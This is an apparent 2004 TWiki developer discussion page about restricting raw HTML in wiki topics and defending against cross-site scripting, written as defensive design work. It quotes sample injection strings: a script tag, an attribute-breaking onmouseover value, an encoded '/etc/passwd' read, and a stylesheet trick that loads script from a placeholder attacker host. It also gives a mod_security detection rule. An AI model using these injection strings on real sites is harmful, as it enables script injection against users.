`EXPLICIT` option to process HTML only between special tags

Situation

TWiki's feature, that people can (and must) write HTML tags directly into the topics, has the following pros and cons:

This could be seen as a feature for experienced people.

Where TWiki's syntax is too poor (for tables, for instance), people can write HTML for more complex text layout.

Users are forced to use &lt; and &gt; for < and >, even if they neither want to write HTML nor know how. This is a serious usability problem.

TWiki syntax should be easy to use for simple things, and harder for more complex things. Not vice versa.

It results in cryptic topic raw texts. The raw text is harder to read and edit, especially for people who don't know HTML (or any programming language at all).

Because TWiki is not WYSIWYG, raw text should be as readable and easy to learn as possible.

Suggestion

As WalterMundt suggests in BetterVerbatim, I think a start and end tag for HTML inclusion would be a nice solution. (This is like inline assembler in Pascal program code :-) )

This is my twiki text, using < and > and everything I want. I just don't have to think about it.
For my form I need HTML:
%STARTHTML% 
  <form action="..."> 
    <input ... /> 
    <input ... /> 
  </form>
%ENDHTML%
Then I continue with clean TWiki markup.

As further suggested by WalterMundt, a global ALLOWHTML could be used to choose TWiki's behaviour.

AUTO - like now
EXPLICIT - allow HTML between %STARTHTML% %ENDHTML% blocks
NEVER - writing HTML is never possible. Why not?

In my opinion, AUTO should be thought of as a compatibility option, rather than an expert mode. EXPLICIT should be the standard behaviour.

Experienced users are still able to write HTML code this way. Other people aren't concerned with this issue at all.
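
A minimal sketch of how the three ALLOWHTML modes could behave, written in Python purely for illustration (TWiki itself is Perl). The function name `render`, the regular expression, and the decision to drop the markers from the output in every mode are assumptions, not part of the proposal:

```python
import html
import re

# Marker names come from the proposal; the matching rules are assumed.
HTML_BLOCK = re.compile(r"%STARTHTML%(.*?)%ENDHTML%", re.DOTALL)


def render(raw, allow_html="EXPLICIT"):
    """Return topic text with < and > handled according to the mode."""
    if allow_html not in ("AUTO", "EXPLICIT", "NEVER"):
        raise ValueError("unknown ALLOWHTML mode: %r" % allow_html)

    if allow_html == "AUTO":
        # Like now: HTML anywhere is passed through untouched.
        return HTML_BLOCK.sub(lambda m: m.group(1), raw)

    out = []
    pos = 0
    for match in HTML_BLOCK.finditer(raw):
        # Text outside the markers is always escaped.
        out.append(html.escape(raw[pos:match.start()], quote=False))
        if allow_html == "EXPLICIT":
            out.append(match.group(1))  # pass the block through
        else:
            out.append(html.escape(match.group(1), quote=False))  # NEVER
        pos = match.end()
    out.append(html.escape(raw[pos:], quote=False))
    return "".join(out)


topic = "Press <ctrl+F4>\n%STARTHTML%<b>x</b>%ENDHTML%"
print(render(topic))
```

With EXPLICIT, the key name is escaped and only the marked block reaches the browser as HTML, so a user who never types %STARTHTML% never has to think about entities.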

-- StefanSteinegger - 08 Nov 2004

Discussion

Related is that the CommentPlugin can be used to componentise any piece of HTML: create a TWiki.UserTemplates and supply a noform="on" parameter.

This can be used for all sorts of handy things - it moves the messy HTML out of the topic to a place where it can be named, managed and reused. The UserTemplates (ComponentisingForceWikiWord) is currently my favourite.

-- MartinCleaver - 08 Nov 2004

Thanks for the clue. (Maybe CommentPlugin should have another name, like FormsPlugin or TemplatePlugin or something.)

But I still want to disable HTML pass-through from topic raw text to the browser. This &lt; and &gt; stuff is just awful.

-- StefanSteinegger - 09 Nov 2004

Be careful with regards to backwards compatibility. We have huge amounts of embedded html.

FWIW, the ability to incorporate html is a big plus in my opinion, and is a distinguishing feature of TWiki.

-- MartyBacke - 09 Nov 2004

I tend to think of CommentPlugin as "!ComponentPlugin"

Here's another example:

Written simply as:

%COMMENT{type="clocklink"}%

But componentised in http://twiki.org/cgi-bin/view/TWiki/UserTemplates#clocklink

Note that there is actually a form generated, you can inhibit this with:

%COMMENT{type="clocklink" noform="on" Clock="0001P-Yellow"}%

Thus:

-- MartinCleaver - 09 Nov 2004

Solitary > and < only have to be escaped if they are used in a situation where they can be confused with HTML tags. As long as the uses of < and > don't look like HTML, and in general the only time they do is when you are trying to demonstrate HTML tags in text, then TWiki will handle them just fine. Personally I don't see much of a usability issue here.

-- CrawfordCurrie - 10 Nov 2004

The problem occurred in my company when people tried to name keys like <ctrl+F4>. TWiki's "auto-html-recognition" feature may be a clever thing, but it has its side-effects. It's making TWiki syntax harder to learn.

I understand that there is a lot of html everywhere. There will be an easy solution for that. It would still be possible to inline html. I think it's worth doing.

Again: People that are able to write html are also able to write %STARTHTML%. People that are not familiar with html should not be concerned with TWiki's "auto-html-recognition" side-effects. That's the usability issue.

Because of the impact on existing code, there should be a compatibility option (should be AUTO, not DIRECT, I changed this now). This setting as a per-topic option would make the compatibility issue much easier. Why not think about the EXPLICIT option to make TWiki more mature?

-- StefanSteinegger - 11 Nov 2004

This topic has a completely wrong name. It should be ExplicitHtmlProcessing. I changed TopicClassification to FeatureBrainstorming.

-- StefanSteinegger - 11 Nov 2004

Thanks Crawford for moving this topic out of GetRidOfHTML.

-- StefanSteinegger - 12 Nov 2004

It's not hard to filter HTML - I managed to do it by accident, before - but the question is what HTML should be filtered. Assuming "filtering" is achieved by converting < and > to &lt; and &gt;, and occurs when a "source" is expanded, the basic rule is to filter HTML from untrusted sources, but not from trusted sources.

Trusted sources are:
- templates
- topics that are change-only for a defined group of people (admins)
- variables that are defined in trusted topics
- code, including plugins (caveat emptor)
Untrusted sources are:
- variables set in user-editable topics
- content included from attachments or by URL

In DEVELOP, variables are already classified according to their source (user variables, various code types), so extending that classification to divide user variables into "trusted" and "untrusted" sets is not that hard (cf. Perl's taint mechanisms). Same with includes.

Untrusted sources can be sanitized using HTML::Scrubber
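
The basic rule can be sketched as follows. This is Python for illustration only; the `Fragment` type and the kind names are hypothetical labels for the source categories listed above, and plain entity conversion stands in for HTML::Scrubber:

```python
import html
from dataclasses import dataclass

# Hypothetical labels for the trusted categories in the list above.
# Anything else (user variables, attachments, URLs, unknown kinds)
# is treated as untrusted, so the filter fails closed.
TRUSTED_KINDS = {"template", "admin_topic", "trusted_variable", "code"}


@dataclass
class Fragment:
    text: str
    kind: str  # where the text came from


def is_trusted(fragment):
    return fragment.kind in TRUSTED_KINDS


def expand(fragments):
    """Join fragments, entity-converting those from untrusted sources."""
    parts = []
    for fragment in fragments:
        if is_trusted(fragment):
            parts.append(fragment.text)
        else:
            parts.append(html.escape(fragment.text, quote=False))
    return "".join(parts)


page = [
    Fragment("<div>", "template"),
    Fragment("<script>x</script>", "url"),
    Fragment("</div>", "template"),
]
print(expand(page))
```

The template markup survives while the content fetched by URL is neutralised. Everything then hinges on the classification being right, which is the hard part.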

-- CrawfordCurrie - 23 Nov 2004

CrawfordCurrie, are you sure that this trusted/untrusted split is as easy as you think it is? I tried it and found it to be difficult, and the "Trusted sources are ... code" makes me think you haven't taken much of a look at the practical issues of implementing it ;-). Under your current proposal:

Each plugin would have to be audited for security; writing:

| <script>alert('hello');</script> |

... would defeat your proposal if TablePlugin were installed. It's basically guaranteed that each un-audited plugin will pass through some text from the user.

Verbatim text, since it's untrusted, would be entity-substituted, so it wouldn't be possible to include > in verbatim text (it would show as "&gt;" on the user's screen).
You can get evil stuff into e.g. templates without needing < and >; for example, you can set WEBBGCOLOR to:

" onmouseover="alert('hello');" booger="

Don't get me wrong; I would be thrilled to hear that splitting text into trusted and untrusted could be made to work, because I'm working on a different approach, and it's turning out badly. I think you're underestimating how difficult it is though.
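
The WEBBGCOLOR case above can be reproduced in a few lines. This is a Python sketch; the `<body bgcolor="...">` template is an assumed stand-in for wherever the variable is actually expanded:

```python
import html

# Assumed template fragment; the real TWiki templates may differ.
TEMPLATE = '<body bgcolor="{bgcolor}">'

# The value from the example above: no < or > anywhere in it.
payload = '" onmouseover="alert(\'hello\');" booger="'


def escape_angle_only(value):
    """The naive filter: convert only < and > to entities."""
    return value.replace("<", "&lt;").replace(">", "&gt;")


# The naive filter leaves the payload untouched, so the attribute is
# closed early and a new event-handler attribute is injected.
naive = TEMPLATE.format(bgcolor=escape_angle_only(payload))

# Escaping quotes as well keeps the value inside the attribute.
safe = TEMPLATE.format(bgcolor=html.escape(payload, quote=True))

print(naive)
print(safe)
```

So a filter that only looks at < and > is not enough for values that land inside an attribute; the escaping has to match the context the value is expanded into.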

-- AndrewMoise - 29 Nov 2004

"... filter out non singleton < and > ..."

Oh, right. Can you say "UTF-7"? Of course you can. So we filter out "+" and "%" as well.

So why don't we pack in TWiki and its programability and all those features that let people build applications and just go back to the very basic Wiki of years ago ...?

I don't think that's going to happen.

Perhaps someone can find an Apache module that does some of it, and breaks a whole pile of what we have now, by ensuring that script etc. cannot be defined in the output.

But that doesn't help for Codev does it, where we discuss bugs and propose solutions.

-- AntonAylward - 29 Nov 2004

err, Anton, we're trying to find a way to secure TWiki, without losing all the functionality.

However, it is important that we are able to provide a totally secure default configuration, so that if people try out twiki on a public host, they are not unwitting victims of our carelessness.

-- SvenDowideit - 30 Nov 2004

Andrew, the plugins by their very nature are a different problem. You can treat plugins in one of two ways:

Sandbox them so they can't do anything evil
Treat them as separate products

To all intents and purposes, TWiki has taken the latter approach. The exceptions to this are the plugins that are bundled by default with the core, which have to be audited. Sven used a good word: "unwitting". We must make absolutely clear what can be trusted, and what can not. It would be great to audit plugins, but the practicalities are something else. As long as the end user cannot assume a "green light" for a plugin, they should be able to make the decision for themselves.

I have indeed thought about implementation of (un)trusted, though I haven't actually done it. I can see several problems with it, mainly related to performance. And there are aspects of HTML that I have never encountered, such as JavaScript in a bgcolor, that would catch me out, sure. BTW note that verbatim currently converts < and > to entities.

There are several cases where current TWiki methodology opens potential holes. These holes have to be plugged, no doubt about it. But IMHO given a sensible trusted/untrusted architecture underneath, it can be done. I said it was a straightforward job; I didn't say it was a small job, though. The required changes pervade many, many lines of code.

If you want a quick hack, then I would suggest:

entity-convert every occurrence of < and > read from user topics in TWiki::Store::readTopic.
This will break verbatim and pre, so provide %VERBATIM% and %PRE% to compensate.
Change default change permissions in WebPreferences to TWikiAdminGroup, and add a BIG WARNING for sysadmins.
Disable %INCLUDE of arbitrary URLs.

This will disable HTML in user topics, at the cost of functionality. It may also break some plugins, but that's their problem.

-- CrawfordCurrie - 30 Nov 2004

Sven: "err, Anton, we're trying to find a way to secure TWiki, without losing all the functionality"

Yes, that's my point.

I've just read - http://www.theregister.co.uk/2004/11/29/ie_security_holes/ - about how Microsoft may be creating the problems of the future. Its theme is that they created the problems of today by focusing on features rather than security and are now playing catch-up with security.

Does this sound like TWiki?

Crawford rightly says ".. [the] current TWiki methodology opens potential holes. These holes have to be plugged, no doubt about it. But ... given a sensible trusted/untrusted architecture underneath, it can be done".

What he misses out on is saying something about "small". You can't prove big stuff can be trusted. Too many possibilities of interactions.

You'll also note that he's said in another form what I've also said in many places. We don't have the control over plugin developers and plugins that we have over the core.

I like the "%VERBATIM%" and "%PRE%" idea. It also makes for an easy conversion. However we still need to worry about embedded %3Cscript%3E (check the raw!) and things like %27cat%20%2fetc%2fpasswd%27 (check the raw again!) embedded in search strings. I haven't seen anyone address that. And can I once again please bring up the issue of UTF-7, which provides for alternate codings for > and <, which several browsers recognise. Perhaps what we need is for TWiki to look to see what character set is in use before it starts filtering!
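
To make the encoding point concrete, here is a small Python sketch. The filter and the `canonicalise` helper are hypothetical; only `urllib.parse.unquote` and the `utf-7` codec are standard library:

```python
from urllib.parse import unquote


def naive_filter_passes(data):
    """A filter that only looks for literal < and > characters."""
    return "<" not in data and ">" not in data


percent_encoded = "%3Cscript%3E"
utf7_encoded = b"+ADw-script+AD4-"

# Both forms sail past the naive filter...
print(naive_filter_passes(percent_encoded))
print(naive_filter_passes(utf7_encoded.decode("ascii")))

# ...yet both turn into a script tag once something decodes them.
print(unquote(percent_encoded))
print(utf7_encoded.decode("utf-7"))


def canonicalise(data, max_rounds=5):
    """Undo percent-encoding repeatedly, so that doubly encoded input
    such as %253C is also reduced before any filtering happens."""
    for _ in range(max_rounds):
        decoded = unquote(data)
        if decoded == data:
            break
        data = decoded
    return data
```

Filtering after canonicalising catches the percent-encoded case. The UTF-7 case is different: it only bites when the browser decides the page is UTF-7, so declaring the character set explicitly matters at least as much as the filter.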

In the mean time, might I suggest that the developers concerned take a look at the code used by various chat room services and web-mail packages. If you think about it for a moment, you will realise they are faced with a similar problem. I can send a plain-text message -- even to a destination behind a firewall -- that ends up being read or rendered by code that interprets HTML. You've seen HTML e-mail, haven't you? How do you think phishing-by-email works? The link may say the name of a reputable bank but the URL behind it, the javascript you invoke, is another matter.

Crawford's 'quick hack' will disable more than just plain old HTML. It will break things like Main.Register, which has embedded javascript, and MartinCleaver's fix to CommentPlugin that componentizes conversion to WikiWords, something I am beginning to use quite extensively. It will mean that we will have to include the javascript in headers, which impacts those of us who want to use pop-up calculators or calendars, and so add the load of them to every topic whether they get used there or not.

There's a lot we've done that's akin to building web applications that rely heavily on ActiveX, then finding it's a high risk and switching to Firefox and losing all we've done (this is something I'm seeing in another forum!).

Rather than just take away this capability wholesale, let's see what we can come up with to go in its place.

-- AntonAylward - 30 Nov 2004

Crawford -- regardless of how you treat plugins, someone has to solve any security problems they pose. The question is whether it's righter, overall, to "fix" things in one place for all plugins, or to "fix" each individual plugin. Any solution that doesn't involve one of those happening will leave twiki just as insecure as not doing anything. Your quick hack doesn't address that issue or the WEBBGCOLOR attack.

Anton -- I agree with your deep concern, particularly the IE/ActiveX analogy. You should know that there are people who are concerned about the current (rather appalling) situation of security within twiki, though, who are working on it. It's a very big job, though.

Re: Main.Register; does that really use embedded javascript? I don't see any (that's relevant) on http://twiki.org/cgi-bin/viewauth/Main/Register?raw=on or http://twiki.org/cgi-bin/view/Codev/Nothing. In any case, any realistic solution to this problem will almost certainly disallow any feature that depends on javascript within a topic (with javascript from plugins as likely collateral damage IMO). I saw both of those as sort of minor features; are there important things that depend on the ability to define javascript in those places? Losing pop-up javascript calculators but having twiki install securely by default would be a huge improvement on the current situation IMHO. Any reasonable solution will involve a configuration option that the administrator can use to disable the secure-but-breaks-some-stuff behavior and go back to the way it is now.

This discussion is badly off-topic for this topic now I think; the question of how to forcibly prevent user-supplied javascript (which is a security issue, and so has to withstand deliberate attacks) is separate from the question of when and how to tell friendly users "please don't put HTML here; use twiki markup instead."

-- AndrewMoise - 01 Dec 2004

Anton,

can I rephrase that to

Sven: "err, Anton, we're trying to find a way to secure TWiki in its default configuration, without losing the functionality that we desire in the advanced but riskier configuration"?

as that's what I'm expecting we will need to do in the end.

In the sites I have deployed, I made it clear that there is no security, and that anyone can impersonate anyone else. That's why the UserCookiePlugin is so simplistic, and insecure. This is not, however, the way that twiki should ship by default; it's a choice that you should have to make consciously.

-- SvenDowideit - 01 Dec 2004

If I can put something between < and > in a topic, does it matter if it's plain old HTML, javascript, CSS or even other stuff that should go in the header such as META or LINK?

Both are deliberate actions on the part of a user. We should not just think about attacks and such actions being done with malicious motives. Harmful results can also arise from non-malicious intent.

-- AntonAylward - 01 Dec 2004

Sven: I agree with you about "out of the box". I've long argued that should also be the case with operating systems, and I see that vendors are slowly coming around to this (e.g. the UNIX and UNIX-like platforms shipping with INETD facilities turned off). I think this is good and wish to encourage it.

But we still don't have a whip hand over the "3rd party" suppliers, which are in this case the plug-in developers. When you install a product for your - supposedly more secure out of the box than it was before - Windows XP, the InstallGuard doesn't scream at you "Your System may now be insecure because of installing this application". Can you imagine the vendors putting up with that, even if it is true?

And as I've pointed out already, users, to say nothing of sysadmins, have been educated, no make that conditioned, to value features more than security. I can't see them giving up their pop-up calendars. And since the computer is there to serve the user, not the other way round, I think this is a justifiable position.

-- AntonAylward - 01 Dec 2004

Andrew: in Main.Register and in MartinCleaver's extension to CommentPlugin look at the in-line code that converts from spaced word to WikiWord. It isn't HTML, that's for sure! It looks like javascript to me.

-- AntonAylward - 01 Dec 2004

Well, insecure third-party things are not preventable, no; my criticism was that since basically every plugin passes through text supplied in the topic at some point, having any plugin installed would subvert Crawford's proposal. To me that's much different from a plugin that accidentally subverts the security model because of an error.

Re: TWikiRegistration and CommentPlugin; okay, I see now. Well, both of these uses are insecure. A user can rewrite the javascript within TWikiRegistration or CommentsTmpl, so sanitizing javascript that comes from those places is correct behavior. The trusted/untrusted split would allow those uses to pass once those topics were write protected, of course...

Within my approach, getting this to work is a little more difficult. Well, CommentsTmpl is pretty easy: put the template in the template, instead of in a topic, and have the plugin arrange for the javascript to go into <head> as a style. TWikiRegistration (which I finally found :-)) is more difficult; I can think of several unpleasant solutions, but no really good one:

Allow the standard variable-definition path to specify a list of additional stylesheets, which must be installed by the administrator within pub/stylesheets or something. Put the javascript there. This is awfully clumsy, but it gets back some more of the flexibility (e.g. user-defined stylesheets, with a little hassle) that is otherwise lost under my approach.
Abandon the automatic spaced-word-to-WikiWord conversion and call the loss a regrettable casualty of the relentless march of progress, er, I mean security.
Put a javascript-containing style to convert spaced words to WikiWords in every template and every page. Simple, but it sucks.

Of these, I dislike the first option the least, but it would be much better to do something, er, better.

-- AndrewMoise - 01 Dec 2004

Andrew: I want to comment on the script in Registration and CommentPlugin first. As with your point about the plugins, this is a different class of problem. This is not a reference to a dot-js file.

You talk about putting the javascript in the <HEAD>. This isn't the kind of thing that goes there. It's not a function, it's "in-line" code.

And as for putting all the javascript js files in the <HEAD>, we promptly run into the problem I've mentioned elsewhere. So I want a popup calendar in the one topic where I have a form so users can define events for the CalendarPlugin. Fine. I add the necessary javascript to the /template for that and all the other skins -- OOPS! forgot one, never mind, well it wouldn't have been an oversight if it was in the topic. And I find I also have the references to the js files for every other piece of javascript I want to use in every other topic in every web on my site, regardless of whether a specific topic, no make that 98% of the other topics, use them or not.

You can bet some user is going to complain about the overhead.

No, the real problem is that I can put <SCRIPT ...src= js file ... > and <LINK ...src= css file ... > in the <BODY> and the client side browser will treat it as if it was in the <HEAD>. If the client side browser treated stuff that should be in the <HEAD> occurring elsewhere as an error, then the risk would be eliminated.

MattWilkie had a feature in his various skins whereby a variable named INLINESTYLE could be defined in a topic. The current default skin - pattern skin - has a similar feature whereby users can define their own style sheets. It isn't that difficult to imagine a stylesheet that reads:

... stylesheet stuff duplicating default
} /* normal close of last item */

</style>

/* insert script block in HEAD to download a 
   javascript file from a remote location
   to do arbitrary stuff
*/
<script ... src="http://www.bgbadsite.com/nastystuff/attack49.js" ...
</script>

/* now patch up so the rest of the pattern skin template works */
<style ....

I'm not a cracker, I don't have that mind set. It was the BGCOLOR example that inspired this. Anything, absolutely ANYTHING that gets expanded at run time in a template can be shoe-horned somehow into doing something the designers didn't originally intend. It's called creativity. People like Crawford employ that creativity in positive ways.

What it comes down to is simply this: any sufficiently powerful system can be abused. It's sort of like Cantor's principle mated with one of von Neumann's.

The trouble is that as long as security is done as an after-thought rather than as part of the initial concept, it will always be a "bag-on-the-side" and as such will be an inconvenience because it is impeding something that was being done before that was insecure. And people get used to the ~~old~~insecure way of doing it and complain when they lose that facility.

Fact of life. One that Microsoft is having to face right now.

-- AntonAylward - 02 Dec 2004

What I meant by putting the javascript in the HEAD was to make it a style (wordbox { onblur: javascript:{foo} }) -- I thought a construction like that was possible, but apparently it's not. Crap. That means the best I can think of is to add a plugin function which lets the plugin make changes to the topic text after the HTML sanitization has been done (if the plugin promises to be very careful), and make a TWikiRegistrationJavascriptPlugin that adds that javascript in. That sounds awful. That approach would let the popup calendar plugin and such continue to work with modifications, though (as well as failing securely until those modifications are made).

Re: the rest, you haven't followed any of the links I keep hopefully making to UsersCanPutJavascriptInTopics, have you? :-) The patch up there does solve the security problems you mention here (e.g. with it, INLINESTYLE doesn't work, nor do a number of other insecure constructs, some of which are semi-necessary for twiki to work). What I'm worrying over now is how to reinstate the features of twiki that that patch currently breaks.

I actually think that for this problem, at least for the immediate future, the "bag on the side" approach is the only one likely to succeed. It's too late to design twiki to be internally resistant to this sort of attack (and in any case that would probably involve a lot of reorganization of user-visible features). Wrapping it in a layer that assumes that everything inside is untrusted, though, can give some assurance of security (though again there will probably be some user-visible changes).

-- AndrewMoise - 02 Dec 2004

You have to somehow be able to distinguish "good" HTML from "tainted". Trying to write "general rules" for sanitizing rendered topics is IMHO doomed to failure, or at least doomed to a mess of special cases and exceptions.

I still believe the "trusted" approach is the right one. For the sake of argument, let's say I have a function "isTrusted" that will tell me if a topic is trusted. I know I can trust anything in a trusted topic, so any variables defined there are inherently trusted, even if they are defined in terms of other variables that are untrustworthy (at this stage there is no way to tell).

Now, when I expand a topic for view, I evaluate the trustworthiness of any topics/variable that contribute to the text of this topic. If any are untrusted, I scrub their input before including it in the final result.

For example, let's say I'm expanding UserTopicA, that includes SystemTopicB, that uses SystemVariableA that is defined in terms of UserVariableB, which is in turn defined in UserTopicA. The following would be scrubbed:

The plain text of UserTopicA, before TML processing, because it comes from an untrusted source viz. UserTopicA.
The value of UserVariableB, because it comes from an untrusted source, viz. UserTopicA.

Nothing else should need to be scrubbed.
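
The UserTopicA walk-through above can be modelled like this. It is a toy Python sketch: the topic texts, the `%INCLUDE{...}%` and `%NAME%` token syntax, and the helper names are all invented for illustration, entity conversion stands in for a real scrubber, and cyclic definitions are not handled:

```python
import html
import re

# Hypothetical trust decision: only SystemTopicB is trusted.
TRUSTED_TOPICS = {"SystemTopicB"}

TOPICS = {
    "UserTopicA": "<i>user text</i> %INCLUDE{SystemTopicB}%",
    "SystemTopicB": "<b>%SYSTEMVARIABLEA%</b>",
}

# variable name -> (topic that defines it, value)
VARIABLES = {
    "SYSTEMVARIABLEA": ("SystemTopicB", "<em>%USERVARIABLEB%</em>"),
    "USERVARIABLEB": ("UserTopicA", "<script>alert(1)</script>"),
}

TOKEN = re.compile(r"%INCLUDE\{(\w+)\}%|%(\w+)%")


def scrub(text):
    return html.escape(text, quote=False)


def expand(text, trusted):
    """Expand tokens in text; literal text is scrubbed unless the
    source it was read from is trusted."""
    out = []
    pos = 0
    for match in TOKEN.finditer(text):
        literal = text[pos:match.start()]
        out.append(literal if trusted else scrub(literal))
        if match.group(1):  # an included topic
            name = match.group(1)
            out.append(expand(TOPICS[name], name in TRUSTED_TOPICS))
        else:  # a variable: trust follows the defining topic
            topic, value = VARIABLES[match.group(2)]
            out.append(expand(value, topic in TRUSTED_TOPICS))
        pos = match.end()
    tail = text[pos:]
    out.append(tail if trusted else scrub(tail))
    return "".join(out)


def view(topic):
    return expand(TOPICS[topic], topic in TRUSTED_TOPICS)


print(view("UserTopicA"))
```

Only the plain text of UserTopicA and the value of UserVariableB come out scrubbed; the markup contributed by SystemTopicB and SystemVariableA passes through, which matches the two bullet points above.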

Changes to the text made by plugins have to be trusted, though a plugin obviously needs to be told if it can trust the sources TWiki is giving it.

Yes, this involves a lot of careful changes to TWiki source, but it is perfectly do-able in the context of the current architecture.

The approach is very similar to Perl's taint mechanism. I wonder, is there any way to leverage that fact?

-- CrawfordCurrie - 02 Dec 2004

"IsTrusted()". Sounds like a good idea. While you're about it could you also write a function that tells if other programs will terminate?

Or do you just mean "has no constructs that may be untrustworthy"? Hmm. Sort of like "GOTOs are untrustworthy". Which means any forms, since they might allow cross-site scripting; any topic that could be edited, since that results in an input form; any topic that has a search field anywhere on it, such as in the top right corner ....

I disagree with you, in the general sense, about "changes made to text by plugins have to be trusted". Think, for example, of your own CommentPlugin. It transforms a topic that has no input (HTML) form into one that does, and in doing so opens up the possibility for cross-site scripting.

Can you say "Covert channels"?

-- AntonAylward - 03 Dec 2004

I think we're getting off focus here because we haven't decided what we are protecting and what we are protecting it from. We're obsessing about tags and the like.

My use of Crawford's CommentPlugin, which builds a form to allow my users to make a calendar entry and has a button to pop up the javascript calendar, is not the problem. The problem is that the form - any form - has input fields that a malicious user can fill in with values that do bad things.

If I could make that topic non-editable (by anyone other than TWikiAdminGroup, all of whom I trust) AND able to be updated by the CommentPlugin AND CommentPlugin did some kind of "taint" checking of the fields, visible and invisible, then the fact that it has javascript in the body wouldn't matter. (OK, I'd have to make the same about the UserTemplate as well.) In one sense this is Crawford's "IsTrusted".

Another example. BGCOLOR and HTTP_EQUIV_ON_VIEW are perfectly safe if they can only be set in the WebPreferences and TWikiPreferences, which topics can only be altered by the trustworthy members of the TWikiAdminGroup AND which are made immutable by putting them in FINALPREFERENCES.

Can you see what I'm saying here? It's not "unsafe constructs", it's trust.

The point is not that there is javascript in a topic, the point is that some malicious person can put javascript or other nasty in there. Someone you can't trust to be a responsible member of the Wiki Community. We can tolerate errors and mistakes since we can work around those. Heck, some of you even patch up my spelling mistakes for me! But malice is different.

I've mentioned that (HTML) forms are a high risk point since they allow users to enter things that can make the CGI scripts do ... stuff that wasn't planned or expected. Eliminating forms, or constraining the forms processing through some tightly controlled mechanism -- Crawford's CommentPlugin is an excellent candidate -- is one example.

So, you say, why can't we get rid of the 'edit' tag and make these comment boxes the exclusive form, backed by whatever 'taint' checking is required.

Answer: Because this is Codev. We need to be able to describe things here that end up looking like constructs we might want to prohibit.

-- AntonAylward - 03 Dec 2004

Before we go much further in constructing solutions, let's stop and consider:

What assets are we trying to protect

What threats are we trying to protect them against

If I have a Chrooted TWiki that uses the perl versions of grep and rcs, what are my risks?

Recall: the formal definition of risk:-

Risk is the probability that an attack will exploit a vulnerability to cause harm or loss to an asset.

We may not know the full set of vulnerabilities that are possible but we should have some idea of the assets.

-- AntonAylward - 03 Dec 2004

See: http://www.modsecurity.org/

Some examples at http://www.modsecurity.org/documentation/quick-examples.html

Security means vigilance, so the scripts that scan the logs and come up with rules to address attacks are part of the package. Not just the package of code, but the package of what a sysadmin is responsible for. As a friend of mine says:

"When entrusted to process, you are obligated to safeguard"

The "principles" for mod_security are excellent. TWiki and TWiki developers would do well to adopt them. (Yes, Crawford, I know you already do!) http://www.modsecurity.org/documentation/development-principles.html

Note: Above, I've mentioned that one of the problems is preventing things like javascript as fields in HTML forms. With mod_security ....

This rule checks all variables for JavaScript, allowing it in a variable named html. Disallowing JavaScript in all variables can be very difficult for some applications (most notably CMS tools). By using this rule we disallow JavaScript in all variables except in the one named html, where we know it can appear.
SecFilterSelective "ARGS|!ARG_html" "<[[:space:]]*script"
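
For readers who don't run mod_security, the logic of the rule quoted above can be sketched in Python. The function name and the `allowed` parameter are made up for illustration, and the case-insensitive match is an assumption rather than something the rule states:

```python
import re

# Same idea as the rule's pattern: "<", optional whitespace, "script".
# Case-insensitive matching is an assumption made for this sketch.
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def rejected_args(args, allowed=("html",)):
    """Return the names of request arguments that contain a script
    tag, skipping the arguments where one is known to be acceptable."""
    return [
        name
        for name, value in args.items()
        if name not in allowed and SCRIPT_TAG.search(value)
    ]


request = {
    "q": "< script>alert(1)",
    "html": "<script>ok()</script>",
    "name": "Anton",
}
print(rejected_args(request))
```

Here only `q` is flagged: `html` is exempt by name and `name` contains nothing suspicious. Note that this sees only literal angle brackets, so input must be decoded first.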

-- AntonAylward - 03 Dec 2004

isTrusted() doesn't imply any sophisticated analysis. Someone has to tell you what is trusted and what is not. The more that is trusted, the faster things will go.

templates is really just a read-only web, so that can be trusted. I would set up other read-only webs as trusted. Sysadmin's discretion.

Anton, your reference to mod_security just made me realise we may be looking at this the wrong way round. Instead of protecting the user by filtering content from an untrusted source, it is better to make sure you can trust any source. Instead of filtering output, filter input. For example, a simple filter could be enabled in a plugin onSaveHandler that prevents the saving of < and >, thus crippling attempts to write-in HTML. It would be simple to write a plugin that had a number of installer-configurable rules for content-rewriting that filters any topics being saved by a non-admin user.

The one change to the core I would advocate to support this would be the addition of a beforeIncludeHandler that would give the plugin a chance to filter text from an included URL or attachment.
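
A rough sketch of the filter-on-input idea, in Python rather than as a real TWiki plugin. The function names mirror the handlers mentioned above but are hypothetical, as is the rule format:

```python
import re

# Hypothetical installer-configurable rules: (pattern, replacement).
DEFAULT_RULES = [
    (re.compile(r"<"), "&lt;"),
    (re.compile(r">"), "&gt;"),
]


def filter_text(text, rules=DEFAULT_RULES):
    """Apply each rewrite rule in order."""
    for pattern, replacement in rules:
        text = pattern.sub(replacement, text)
    return text


def on_save(text, user_is_admin, rules=DEFAULT_RULES):
    """Topics saved by admins are stored as-is; everything else is
    rewritten before it reaches the store."""
    return text if user_is_admin else filter_text(text, rules)


def before_include(text, rules=DEFAULT_RULES):
    """Text pulled in from a URL or attachment is always filtered."""
    return filter_text(text, rules)


print(on_save("<b>hi</b>", user_is_admin=False))
print(on_save("<b>hi</b>", user_is_admin=True))
```

With these default rules the filter is idempotent, so re-saving an already filtered topic does not change it again. Topics stored before the filter was installed are not covered and would need a one-off pass.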

-- CrawfordCurrie - 03 Dec 2004

Filtering input: My apologies. We have been talking at cross purposes. I've always assumed we were talking about input. The search/grep hack was about input. I've been assuming a system that was 'trusted' when it was installed and the basic facilities and basic configuration were done by a trusted site or system administrator. So the risk came from what was added after that point. Input to HTML forms by users -- the search/grep vulnerability being one example. Cross site scripting problems arising from other HTML forms being another. And finally a registered user editing in a body that exploits a vulnerability in other users' browsers. The most obvious of these being something that fetches and runs javascript from a remote site (i.e. not the one running the wiki).

I haven't fully audited the code of mod_security, but can I once again emphasise that dealing with < and > is only part of the problem. Browsers are a great part of the problem because they try to do 'smart things' like deal with percent-hexadecimal representations, other character sets and so forth. I see code in mod_security that tries to deal with this.

I wonder if the most pragmatic approach is to adopt mod_security and work with that project rather than add more code to TWiki.

-- AntonAylward - 03 Dec 2004

Another solution: MartinCleaver has just written about PurpleSlurple (http://www.purpleslurple.net). This prompted me to recall a vague idea about topics that have parts that cannot be altered. At the moment I fudge this with a %INCLUDE of a topic that can't be edited. However I think that there are some ideas about the purple sections that we didn't explore enough when the matter first came up. Perhaps we need to speak to the Wikipedia people to see if they have any feelings about how this technique can be used as a security-by-compartmentalising tool.

-- AntonAylward - 03 Dec 2004

WebForm
TopicClassification	FeatureEnhancementRequest
TopicSummary	`EXPLICIT` option to process HTML only between special tags.
InterestedParties	StefanSteinegger AntonAylward AndrewMoise
AssignedTo
AssignedToCore
ScheduledFor
RelatedTopics	UsersCanPutJavascriptInTopics
SpecProgress
ImplProgress
DocProgress

Topic revision: r21 - 2004-12-03 - AntonAylward
